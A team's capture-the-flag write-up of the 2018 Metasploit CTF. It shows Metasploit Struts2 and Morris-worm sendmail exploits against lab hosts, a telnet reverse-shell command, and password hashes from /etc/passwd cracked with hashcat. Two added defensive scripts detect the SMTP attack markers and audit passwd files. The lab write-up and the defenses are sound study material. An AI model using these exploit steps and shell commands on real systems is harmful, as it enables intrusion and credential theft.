Metasploit CTF 2018 Writeup
So just recently, I participated in the 2018 Metasploit CTF. I got some flags, created some shells with my team, and had some fun. The challenges ranged from difficult to really straightforward. We ended up getting about 5 flags (I know, not a whole lot, but this was my first time participating in a CTF like this) and I feel very proud of myself and my team for how much we did. I will definitely be doing this CTF next year as it's a very good one, and I learned a lot from it. The methods used to acquire the flags below were developed in collaboration with the team (B0rn2r00t, jetson23, Nukez, T, and fir, thank you guys) and are not solely my work. All credit goes to everyone involved in the CTF team.
Configuration
The CTF was organized in a very interesting way. There were three boxes in total. Two were targets (one being a Windows interface and one being a Linux interface), and to be able to attack these targets, you had to access them through a Kali Linux box that was provided to you through a given IP. Once connected to this box, we could go ahead and attack the targets through the terminal given. (Although I did not realize this until after the competition, you could configure proxychains in the Kali box to be able to use tools outside of the box instead of being limited to the provided CLI and tools.)
3 of Clubs
The three of clubs was a very simple challenge. This one could be found by simply reading the entire rules on the CTF site. Once you do, you will find a line that will look like this

Upon looking at this, it tells us to go to a website on the Linux machine hosted on port 31063. We can access this through a terminal program known as links.
links http://172.16.28.38:31063
Once the page loads up, we are immediately asked how to describe the reward we are seeking in one word in a text field below. If we read the rules, it mentions a splendiferous reward that is to be found on this server. If we take a look at the source, it takes what we input into the field, adds .png at the end of it and treats it as a URL.
Therefore, we can just use a simple wget request to get our flag
wget http://172.16.28.38:31063/splendiferous.png
And the three of clubs is now ours!

10 of Hearts
From here, we decided to run a port scan on the Ubuntu machine. We tried the Windows machine but we were unable to get any flags from it, so there won't be any information about it here. The following was the output of the scan:
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-01 08:16 UTC
Nmap scan report for 172.16.28.37
Host is up (0.0046s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
25/tcp   open  smtp
79/tcp   open  finger
2222/tcp open  EtherNetIP-1
8080/tcp open  http-proxy
8181/tcp open  intermapper
8443/tcp open  https-alt
Reading this, we can see that there is an HTTP service running on port 8080. After further analysis, it appears to be an Apache Struts instance.
8080/tcp open http-proxy
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Struts2 Showcase
|_Requested resource was showcase.action
Through further analysis, we figured out that the Struts instance is running version 2.3.x and, thankfully, there is an exploit available in Metasploit. The module's name is exploit/multi/http/struts2_code_exec_showcase. We proceeded to exploit it and used the payload cmd/unix/reverse_bash.
The options we used are below:
Module options (exploit/multi/http/struts2_code_exec_showcase):

Name       Current Setting                   Required  Description
----       ---------------                   --------  -----------
POSTPARAM  name                              yes       The HTTP POST parameter
Proxies                                      no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS     172.16.28.37                      yes       The target address range or CIDR identifier
RPORT      8080                              yes       The target port (TCP)
SSL        false                             no        Negotiate SSL/TLS for outgoing connections
TARGETURI  /integration/saveGangster.action  yes       The path to a struts application action
VHOST                                        no        HTTP server virtual host

Payload options (cmd/unix/reverse_bash):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  172.16.28.36     yes       The listen address (an interface may be specified)
LPORT  9010             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Universal
We happened to get a shell with this, but now we must hunt down the flag. Luckily, we were able to find it in the directory /usr/local/tomcat/tmp. Upon looking in here we were able to find the 10 of hearts.
cd /usr/local/tomcat/tmp
ls -al
total 328
drwxr-xr-x  2 root root   4096 Nov 26 20:43 .
drwxr-xr-x 19 root root   4096 Dec  1 06:01 ..
-rwxr--r--  1 root root 326794 Nov 26 20:42 10_of_hearts

2 of Diamonds
This flag was a difficult one, as it involved a lot of different steps. When we did our Nmap scan we noticed port 25 was open and running an SMTP server. We decided to see if we could find an open relay on the server, and sure enough, there was.
msf5 auxiliary(scanner/smtp/smtp_relay) > exploit
[+] 172.16.28.37:25 - SMTP 220 2-of-diamonds Sendmail 5.51/5.17 ready at Mon, 1 Dec 86 03:02:45 PST\x0d\x0a
[*] 172.16.28.37:25 - "500 Command unrecognized\r\n"
[*] 172.16.28.37:25 - "250 <sender@example.com>... Sender ok\r\n"
[*] 172.16.28.37:25 - "250 <target@example.com>... Recipient ok\r\n"
[*] 172.16.28.37:25 - "354 Enter mail, end with \".\" on a line by itself\r\n"
[*] 172.16.28.37:25 - "250 Ok\r\n"
[+] 172.16.28.37:25 - Potential open SMTP relay detected: - MAIL FROM:<sender@example.com> -> RCPT TO:<target@example.com>
[*] 172.16.28.37:25 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Using another module, we also found out that the SMTP server was a Sendmail 5.51/5.17 server. Just like the 10 of hearts, there is an exploit for this specific version. We then searched for anything related to sendmail and got these results.
Matching Modules
================

Name                                        Disclosure Date  Rank       Check  Description
----                                        ---------------  ----       -----  -----------
auxiliary/dos/smtp/sendmail_prescan         2003-09-17       normal     No     Sendmail SMTP Address prescan Memory Corruption
exploit/linux/misc/hplip_hpssd_exec         2007-10-04       excellent  No     HPLIP hpssd.py From Address Arbitrary Command Execution
exploit/multi/http/phpmailer_arg_injection  2016-12-26       manual     No     PHPMailer Sendmail Argument Injection
exploit/solaris/lpd/sendmail_exec           2001-08-31       excellent  No     Solaris LPD Command Execution
exploit/unix/smtp/clamav_milter_blackhole   2007-08-24       excellent  No     ClamAV Milter Blackhole-Mode Remote Code Execution
exploit/unix/smtp/morris_sendmail_debug     1988-11-02       average    Yes    Morris Worm sendmail Debug Mode Shell Escape
post/linux/gather/enum_configs                               normal     No     Linux Gather Configurations

There is one big detail that helped us determine which exploit to use. The banner from the earlier relay scan says the server was ready at December 1, 1986, and when we look at the disclosure dates next to the modules, we can see that the Morris Worm was disclosed on 1988-11-02. We decided to go with this module along with the cmd/unix/reverse payload. Thankfully we were successful.
msf5 exploit(unix/smtp/morris_sendmail_debug) > exploit
[*] Started reverse TCP double handler on 172.16.28.36:4444
[*] 172.16.28.37:25 - Connecting to sendmail
[*] 172.16.28.37:25 - Enabling debug mode and sending exploit
[*] 172.16.28.37:25 - Sending: DEBUG
[*] 172.16.28.37:25 - Sending: MAIL FROM:<Br3XVjJuaJpXYManvhOxBXuwv>
[*] 172.16.28.37:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
[*] 172.16.28.37:25 - Sending: DATA
[*] 172.16.28.37:25 - Sending: PATH=/bin:/usr/bin:/usr/ucb:/etc
[*] 172.16.28.37:25 - Sending: export PATH
[*] 172.16.28.37:25 - Sending: sh -c '(sleep 3655|telnet 172.16.28.36 4444|while : ; do sh && break; done 2>&1|telnet 172.16.28.36 4444 >/dev/null 2>&1 &)'
[*] 172.16.28.37:25 - Sending: .
[*] 172.16.28.37:25 - Sending: QUIT
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo oq9MvZlFwNKDbXzN;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: Connected: not found\r\nsh: Escape: not found\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (172.16.28.36:4444 -> 172.16.28.37:48210) at 2018-12-01 11:06:29 +0000
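From the defender's side, the session above has two unmistakable markers in the SMTP command stream: the DEBUG verb and a recipient that begins with a pipe. The following is an added example, not part of the original writeup or of Metasploit: a small detector that reads an SMTP command log and reports, per client, whether the server rejected or accepted each marker. The log format (timestamp, client IP, C:/S: direction), the "200 Debug set" reply and the 192.0.2.10 client are assumptions constructed for the example.

```python
import re
from collections import defaultdict

# Assumed log format: "<timestamp> <client-ip> <C|S>: <SMTP line>"
LINE = re.compile(r'^(?P<ts>\S+) (?P<client>\S+) (?P<dir>[CS]): (?P<text>.*)$')
DEBUG_VERB = re.compile(r'^DEBUG\b', re.I)
# A recipient that starts with "|" is handed to a program, not a mailbox.
PIPE_RCPT = re.compile(r'^RCPT\s+TO:\s*<\s*"?\s*\|', re.I)

# Constructed sample: one session against a vulnerable server, one against
# a server that refuses DEBUG and then receives ordinary mail.
SAMPLE_LOG = """\
2018-12-01T11:06:26Z 172.16.28.36 C: DEBUG
2018-12-01T11:06:26Z 172.16.28.36 S: 200 Debug set
2018-12-01T11:06:26Z 172.16.28.36 C: MAIL FROM:<sender@example.com>
2018-12-01T11:06:26Z 172.16.28.36 S: 250 <sender@example.com>... Sender ok
2018-12-01T11:06:27Z 172.16.28.36 C: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
2018-12-01T11:06:27Z 172.16.28.36 S: 250 Recipient ok
2018-12-01T11:07:00Z 192.0.2.10 C: DEBUG
2018-12-01T11:07:00Z 192.0.2.10 S: 500 Command unrecognized
2018-12-01T11:07:01Z 192.0.2.10 C: RCPT TO:<target@example.com>
2018-12-01T11:07:01Z 192.0.2.10 S: 250 <target@example.com>... Recipient ok
""".splitlines()

def analyze(log_lines):
    """Return {client: sorted findings}, each finding as 'kind:status'."""
    pending = {}                    # client -> marker awaiting the server reply
    findings = defaultdict(set)
    for raw in log_lines:
        m = LINE.match(raw.strip())
        if not m:
            continue                # skip lines that are not in the log format
        client, text = m["client"], m["text"]
        if m["dir"] == "C":
            if DEBUG_VERB.match(text):
                pending[client] = "debug"
            elif PIPE_RCPT.match(text):
                pending[client] = "pipe-rcpt"
            else:
                pending.pop(client, None)
        else:
            kind = pending.pop(client, None)
            if kind:                # a 2xx reply means the server went along
                status = "accepted" if text.startswith("2") else "rejected"
                findings[client].add(f"{kind}:{status}")
    return {c: sorted(f) for c, f in findings.items()}

if __name__ == "__main__":
    for client, found in analyze(SAMPLE_LOG).items():
        print(client, found)
```

An "accepted" finding means the server itself needs patching or replacing; a "rejected" one is still worth alerting on as a probe.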
We don't seem to be root in the system, so let us go ahead and see if we can get some password hashes. Using cat /etc/passwd we manage to get some password hashes, and we are done with our shell. We put the hashes into hash-identifier and it tells us that it is using the DES hash algorithm. Using hashcat with the rockyou wordlist, we were able to crack the hashes.
ec2-user@kali:~/ubuntu$ hashcat -m 1500 hashes --wordlist /usr/share/wordlists/rockyou.txt --force
FA/4weg1/wy2c:biteme ghg
OciUqGHcs9YOw:fatcat tef
s.EZm/wQTqbro:whocares ralph
NYqgD2jjeuozk:hacker Shannon
hnZ1ZK5H2qapE:lancelot miriam
uxxJaRZvgyiPg:fun rich
6l7zMyp8dZLZU:foobar ckusick
Yd6H6R7ejeIP2:raygun sam
.6s.pzMqjyMrU:haring jim
STpwu/Ggmk78A:noexit van
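The hashes were recoverable because they sat in the world-readable /etc/passwd instead of a shadow file, and because traditional DES crypt only uses the first 8 characters of a password. The following is an added example, not part of the original writeup: an audit function that classifies the password field of each passwd line and reports the entries that expose a hash or have no password at all. The two hashes are the ones shown on this page; the UIDs, home directories and the other accounts are constructed for the example.

```python
import re

# Traditional DES crypt(3): 2 salt + 11 hash characters from [./0-9A-Za-z].
DES_CRYPT = re.compile(r'^[./0-9A-Za-z]{13}$')

# Constructed sample file; only the two 13-character hashes come from the page.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
ghg:FA/4weg1/wy2c:101:10:constructed entry:/home/ghg:/bin/sh
hunter:IE4EHKRqf6Wvo:102:10:constructed entry:/home/hunter:/bin/sh
nobody:*:65534:65534::/:/bin/false
guest::103:10::/home/guest:/bin/sh
"""

def audit_passwd(text):
    """Return (line number, user, finding) for every risky passwd(5) entry."""
    report = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            report.append((lineno, fields[0], "malformed"))
            continue
        user, pw = fields[0], fields[1]
        if pw == "x" or pw.startswith(("!", "*")):
            continue                      # shadowed or locked: nothing exposed
        if pw == "":
            finding = "empty-password"
        elif DES_CRYPT.match(pw):
            finding = "des-crypt-exposed"  # 8-char limit, cheap to brute-force
        elif pw.startswith("$"):
            finding = "modular-hash-exposed"
        else:
            finding = "unknown-format"
        report.append((lineno, user, finding))
    return report

if __name__ == "__main__":
    for entry in audit_passwd(SAMPLE_PASSWD):
        print(entry)
```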
We can now log in with these credentials, but we are not able to access a certain folder, namely /etc/guest/hunter. When we ran his hash in hashcat, it wasn't successful with the rockyou wordlist, so we had to do a brute-force attack.
hashcat -m 1500 IE4EHKRqf6Wvo -a 3 ?1?1?1?1?1?1?1 -i --increment-min=6 --force
IE4EHKRqf6Wvo:msfhack hunter
Thankfully, it was successful and we found the password to be msfhack. Using this we switched to hunter to access his folder. Upon access, we found the movemail program in there, which also happens to be setuid root, allowing us to copy any file on the system. Using this we copied over the 2 of Diamonds.
movemail /usr/games/lib/2_of_diamonds.dat /usr/guest/2_of_diamonds.dat
Unfortunately, it's encrypted and unreadable but while poking around, we found an adventure file. Of course, we copied it over.
movemail /usr/games/adventure /usr/hunter/adventure
We made the adventure file executable and ran it. I will spare the details since it takes a while but once you complete it, you will get a password to decrypt the 2 of Diamonds.

5 of Spades
To get the 5 of Spades, you simply needed to poke around in Metasploit a bit. Once we did, we found a very interesting module called exploit/multi/ctf/flag. Using it outputs this:
5_of_spades is at http://host-ip:9021/0.png
All we have to do is initiate a wget request, and the flag is ours.

8 of Diamonds
To find the 8 of diamonds, we must look at a service running on port 8181. Upon further investigation, it seems to be running an HTTP server. Using wget, we can download the webpage and analyze it locally on the console.
wget http://172.16.28.37:8181/ -O page.html
Upon investigation of the HTML page, there seems to be some JS code in the file. Upon further analysis, it seems to be obfuscated. We can easily use IlluminateJS (https://illuminatejs.com/) and paste the obfuscated code into the site to be deobfuscated.
Once we do, it outputs some data encoded in base64. All we have to do is copy this into a text file and decode it:
base64 -d flag.txt > flag
Once we do, it outputs a png file which just so happens to be our flag!

Again, this CTF was very interesting and educational for both me and my team. I would like to thank my teammates and Rapid7 for this CTF. Without them, I could not have done most of the things in this CTF. I hope and expect to do this again next year.
Until then...